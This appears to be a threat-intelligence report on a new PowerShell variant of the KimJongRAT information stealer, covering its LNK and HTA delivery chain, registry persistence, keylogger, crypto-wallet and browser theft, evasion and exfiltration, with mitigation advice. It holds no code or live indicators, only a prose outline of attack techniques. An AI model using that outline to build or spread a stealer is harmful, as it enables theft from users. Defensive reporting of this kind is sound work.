Security researchers have identified a new and sophisticated variant of the KimJongRAT information stealer, notable for its advanced evasion techniques, robust persistence mechanisms, and a novel PowerShell-based implementation. This latest evolution of the KimJongRAT malware family, which first emerged in 2013, demonstrates a heightened focus on stealing both general system data and cryptocurrency assets, leveraging multi-stage delivery chains and legitimate infrastructure to evade detection.
Infection Chain and Delivery Mechanisms
The new KimJongRAT variant is distributed through carefully crafted malicious Windows shortcut (LNK) files. When executed by an unsuspecting user, these LNK files download an HTML Application (HTA) file from an attacker-controlled Content Delivery Network (CDN), often utilizing legitimate cloud services to bypass traditional security controls.
PowerShell Variant Workflow
The PowerShell-based variant follows a multi-stage infection process:
- LNK File Execution: The user initiates the attack by clicking a malicious LNK file, which downloads and runs an HTA file.
- Payload Deployment: The HTA file drops a decoy PDF and a ZIP archive onto the victim’s system.
- Archive Extraction: The ZIP archive contains the PowerShell-based stealer and a Visual Basic Script (VBS) for persistence.
- Stealer Activation: The PowerShell script loads both the stealer and an embedded keylogger, establishes registry-based persistence, and initiates data exfiltration.
- Data Exfiltration: Stolen information is compressed and transmitted to the attacker’s command-and-control (C2) server in discrete chunks via HTTP POST requests.
Technical Capabilities
The PowerShell variant of KimJongRAT is engineered for comprehensive data theft and stealth:
- Data Harvesting: The malware targets browser data and cryptocurrency wallet extensions, including MetaMask, Trust Wallet, TronLink, Binance Chain Wallet, Coinbase Wallet, Phantom, Exodus Web3 Wallet, and more than 40 additional wallets. It extracts credentials, cookies, and sensitive files from popular browsers such as Chrome, Edge, Firefox, and Naver Whale.
- Keylogging: An integrated keylogger captures keystrokes, clipboard contents, and active window titles.
- Persistence: A VBS script ensures the stealer is re-executed at each user logon by modifying specific registry keys.
- Evasion: The malware employs anti-virtual machine (anti-VM) techniques and obfuscation methods, including encoded scripts and custom encryption (XOR, RC4), to hinder analysis and detection.
- Backdoor Functionality: KimJongRAT enables remote command execution, additional malware deployment, file uploads/downloads, and interactive sessions with compromised systems.
Trends and Threat Landscape
This campaign demonstrates several notable trends in the cyber threat landscape:
- Multi-Stage, Multi-File Architecture: The use of multiple files and stages, combined with trusted Windows utilities (such as cmd.exe and curl.exe) and public CDN infrastructure, complicates detection and incident response.
- Cryptocurrency Targeting: The shift towards stealing digital assets reflects broader cybercriminal monetization strategies, with both individuals and organizations in the cryptocurrency space at heightened risk.
- Regional Focus: The use of Korean-language lures suggests a possible focus on South Korean targets, although the techniques are broadly applicable.
Indicators of Compromise (IOCs)
Security teams should be vigilant for the following indicators:
- SHA256 hashes for the LNK, HTA, PowerShell loader, stealer, keylogger, and persistence scripts.
- Known malicious CDN URLs and command-and-control server addresses.
Mitigation Strategies
To defend against this evolving threat, organizations should:
- Implement advanced behavioral monitoring and endpoint detection.
- Employ URL and DNS filtering to block suspicious domains and CDN activity.
- Educate users about the risks of opening unsolicited shortcut files and attachments.
- Regularly update incident response procedures to address multi-stage malware campaigns.
